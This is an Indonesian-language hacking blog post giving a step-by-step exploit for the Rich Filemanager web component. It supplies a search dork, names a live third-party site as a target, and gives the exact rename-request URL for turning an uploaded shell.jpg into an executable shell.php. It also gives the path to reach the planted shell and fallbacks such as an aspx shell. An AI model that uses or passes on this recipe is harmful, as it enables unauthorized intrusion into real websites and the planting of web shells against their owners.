Rich Filemanager dork: /filemanager/userfiles (Kembangin anjg jan manja) live target: http://bxbin.com/BxFlipTV/assets/filemanager/ Pilih salah satu y 1.Tamper data (Target yang w kasih ga support tamper) 2.Rename, jadi u upload shell dlu formatnya jpg abis itu kasih exploit kek gini /filemanager/connectors/php/filemanager.php?mode=rename&old=/BxFlipTV/assets/filemanager/userfiles/shell.jpg&new=shell.php Nah pas bagian old dibawah ini u ganti path sitenya, tapi kadang ada yang langsung gini old=/userfiles/shell.jpg akses shell? /filemanager/userfiles/shell.php Gabisa up shell? Atau shell pas diakses ga anu, coba make shell aspx kali aja serverny ga install php. Tapi kalo emang gabisa semua, coba tamper file txt u atau script kek ke dir home, hapus pada path uploadnya sc:mamad 0N3RID3R thx:Indonesia To World
Comments
Post a Comment